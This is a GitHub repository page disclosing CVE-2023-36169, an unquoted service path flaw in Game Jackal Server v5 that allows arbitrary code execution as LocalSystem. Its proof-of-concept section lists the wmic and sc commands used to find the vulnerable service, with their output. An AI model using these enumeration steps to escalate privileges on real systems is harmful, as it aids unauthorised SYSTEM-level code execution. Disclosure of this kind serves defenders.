Skip to content
/ CVE-2023-36169 Public

An issue in SlySoft Game Jackal Pro v.5.2.0.0 allows an attacker to execute arbitrary code via the server.exe component

0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

TraiLeR2/CVE-2023-36169

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2023-36169

An issue in SlySoft Game Jackal Pro v.5.2.0.0 allows an attacker to execute arbitrary code via the server.exe component

Exploit Title: Game Jackal Server v5 - Unquoted Service Path

Date: 05/08/2023

Exploit Author: Idan Malihi

Vendor Homepage: https://www.allradiosoft.ru

Software Link: https://www.allradiosoft.ru/en/ss/index.htm

Version: 5

Tested on: Microsoft Windows 10 Pro

CVE : CVE-2023-36169

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """ Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto

C:\Users>sc qc GJServiceV5 [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GJServiceV5 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Game Jackal Server v5 DEPENDENCIES : SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

About

An issue in SlySoft Game Jackal Pro v.5.2.0.0 allows an attacker to execute arbitrary code via the server.exe component

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published